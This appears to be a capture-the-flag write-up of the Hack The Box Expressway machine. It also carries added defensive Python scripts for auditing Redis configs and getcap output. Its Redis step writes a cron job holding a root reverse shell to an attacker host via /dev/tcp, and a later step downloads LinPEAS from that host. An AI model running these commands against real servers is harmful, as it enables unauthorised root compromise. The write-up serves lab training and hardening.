
Introduction:
Hack The Box’s Expressway machine is a classic Linux-based challenge that tests a practitioner’s skills in enumeration, vulnerability assessment, and privilege escalation. Mastering the command line is not just beneficial; it is an absolute necessity for navigating the intricate vulnerabilities of such systems and pivoting from initial foothold to full root compromise.
Learning Objectives:
- Master advanced service enumeration and network reconnaissance techniques.
- Understand and exploit common misconfigurations in services like Redis.
- Execute proven Linux privilege escalation vectors to gain root access.
You Should Know:
1. Initial Reconnaissance with Nmap
`nmap -sC -sV -T4 -oA initial_scan 10.10.11.221`
`nmap --script vuln -oA vuln_scan 10.10.11.221`
Step‑by‑step guide: The first command initiates a comprehensive Nmap scan with default scripts (-sC), version detection (-sV), aggressive timing (-T4), and outputs results in all formats (-oA). The follow-up `vuln` script scan probes for known vulnerabilities. This two-step process is critical for identifying open ports (discovering port 6379/Redis was key here) and potential weak points without being overly intrusive.
2. Interacting with an Exposed Redis Server
`redis-cli -h 10.10.11.221`
`INFO`
`config set dir /var/spool/cron/crontabs/`
`config set dbfilename root`
`set crackit " /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'"`
`save`
Step‑by‑step guide: Upon discovering an unprotected Redis server, use `redis-cli` to connect. The `INFO` command gathers server details. The critical exploit involves reconfiguring Redis’s save directory to the system’s crontab directory (/var/spool/cron/crontabs/) and setting the dump filename to `root`. A cron job payload is written into the database with the `set` command and persisted to disk with `save`, resulting in a reverse shell executed as root.
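An added defender-side check, not code from the original post: it parses a redis.conf and flags the settings that let an anonymous client rewrite the save path and filename the way step 2 describes (the same exposure the closing notes warn about). Both sample configs are constructed, and the hardened one uses a placeholder password.

```python
# Added example (not from the original post): audit a redis.conf for the
# settings that let an unauthenticated client write files through
# CONFIG SET dir/dbfilename followed by SAVE. Both configs are constructed.

def parse_redis_conf(text):
    """Map each directive to the list of argument strings it was given;
    directives may repeat (rename-command), so values are kept in order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        conf.setdefault(name.lower(), []).append(args.strip())
    return conf

def audit_redis_conf(text):
    """Return findings as strings; empty means none of the checked weaknesses
    is present. Defaults mirror Redis: no 'bind' means every interface,
    'protected-mode' defaults to yes, no 'requirepass' means no auth."""
    conf = parse_redis_conf(text)
    findings = []
    bind_addrs = [a for v in conf.get("bind", []) for a in v.split()]
    if not bind_addrs or any(a in ("0.0.0.0", "*", "::") for a in bind_addrs):
        findings.append("bind: reachable on all interfaces (use 'bind 127.0.0.1')")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if conf.get("requirepass", [""])[-1].strip('"') == "":
        findings.append("requirepass: no password, every client is trusted")
    renamed = {v.split()[0].lower() for v in conf.get("rename-command", []) if v}
    if "config" not in renamed:
        findings.append("rename-command: CONFIG is still callable by name")
    return findings

# Constructed sample: the kind of default install the walkthrough abuses.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
"""

# Constructed sample: the same server after hardening (password is a placeholder).
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass CHANGE-ME-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis
"""
```

Run `audit_redis_conf` over the live config file on each Redis host; with the CONFIG command renamed and a bind address on loopback, the dir/dbfilename trick has nothing to reach.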
3. Stabilizing a Reverse Shell
`python3 -c 'import pty; pty.spawn("/bin/bash")'`
`export TERM=xterm`
`Ctrl+Z`
`stty raw -echo; fg`
Step‑by‑step guide: A raw reverse shell is often unstable. This sequence stabilizes it. The Python command spawns a fully interactive TTY. `export TERM=xterm` enables advanced terminal features. Backgrounding the shell with `Ctrl+Z` and running `stty raw -echo; fg` on the local machine corrects terminal settings, providing a fully interactive shell for efficient navigation.
4. Automated Enumeration with LinPEAS
`cd /dev/shm`
`wget http://10.10.14.5:8000/linpeas.sh`
`chmod +x linpeas.sh`
`./linpeas.sh | tee linpeas_output.txt`
Step‑by‑step guide: Transfer the LinPEAS script from your attacking machine to the target's temporary directory (/dev/shm). After making it executable, run it and pipe the output to `tee` to simultaneously see it and save it to a file. LinPEAS automates the enumeration of misconfigurations, sensitive files, and potential privilege escalation vectors, saving crucial time.
5. Linux Capability-Based Privilege Escalation
`getcap -r / 2>/dev/null`
Step‑by‑step guide: This command recursively (-r) searches the entire filesystem (/) for files with assigned capabilities, suppressing permission denied errors (2>/dev/null). Capabilities break down root privileges, and a misconfigured capability like `cap_setuid+ep` on a binary can be exploited to gain root. This is a cleaner, often less detected method than classic SUID exploits.
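An added triage script, not part of the original post, that reads saved `getcap -r /` output and reports the capabilities a defender should review. The allowlist of stock binaries is an assumed baseline, and the sample output lines are constructed.

```python
# Added example (not from the original post): triage 'getcap -r / 2>/dev/null'
# output from the defender's side, flagging file capabilities that are
# root-equivalent or unexpected for that binary. All sample data is constructed.
import re

# Caps that bypass DAC or change identity: treat like SUID root on unexpected binaries.
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_chown",
                   "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}
# Assumed baseline of capabilities stock packages legitimately set.
EXPECTED = {"/usr/bin/ping": {"cap_net_raw"}, "/usr/bin/mtr-packet": {"cap_net_raw"}}

def parse_getcap_line(line):
    """Return (path, {cap: flags}) for either getcap output style:
    '/usr/bin/ping cap_net_raw=ep' (newer libcap) or
    '/usr/bin/ping = cap_net_raw+ep' (older libcap); None if unparseable."""
    parts = line.strip().split()
    if len(parts) < 2:
        return None
    path, caps = parts[0], {}
    for clause in (p for p in parts[1:] if p != "="):
        m = re.match(r"^([a-z0-9_,]+)[=+-]([eip]*)$", clause)
        if not m:
            return None
        for name in m.group(1).split(","):
            caps[name] = m.group(2)
    return path, caps

def triage_getcap(output):
    """Return (path, capability) pairs worth investigating: root-equivalent, or
    not on the allowlist for that path. Inheritable-only caps are skipped."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            if not ({"e", "p"} & set(flags)):
                continue
            if name in ROOT_EQUIVALENT or name not in EXPECTED.get(path, set()):
                findings.append((path, name))
    return findings

# Constructed sample mixing both output styles and one inheritable-only entry.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/local/bin/backup-helper cap_dac_read_search,cap_setuid=ep
/opt/legacy/reportgen = cap_setuid+ep
/usr/bin/tracer cap_sys_ptrace=i
"""
```

Feed it `getcap -r / 2>/dev/null > caps.txt` from a golden image first, so the allowlist reflects what your build actually ships before it is run against production hosts.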
What Undercode Say:
- The Expressway box is a masterclass in exploiting default configurations. Services like Redis should never be exposed to untrusted networks without authentication.
- Modern privilege escalation is less about obscure kernel exploits and more about meticulous enumeration for misconfigurations in capabilities, cron jobs, and sudo rights.
The simplicity of the Redis cron job exploit underscores a critical lesson in cybersecurity: the most devastating breaches often stem from the most basic oversights. This machine reinforces that penetration testing is a structured process of enumeration, exploitation, and persistence. The heavy reliance on automated tools like LinPEAS highlights a shift in the industry towards leveraging scalable enumeration to quickly identify low-hanging fruit, a skill now fundamental for both red and blue teams. The true takeaway is that defense requires assuming any unhardened service will be found and exploited.
Prediction:
The exploitation of misconfigured auxiliary services like Redis, Docker, and message queues will become the primary initial access vector for mid-level attacks, surpassing traditional web application vulnerabilities. As cloud and DevOps practices accelerate, automation often outpaces security, leaving countless data storage and management services exposed by default. Future offensive security research will focus on developing automated tooling to rapidly identify and weaponize these configuration flaws at scale, forcing a paradigm shift in defensive postures towards strict network segmentation and zero-trust identity management for all services, not just primary applications.
Reported By: https://lnkd.in/p/duxahBS5 – Hackers Feeds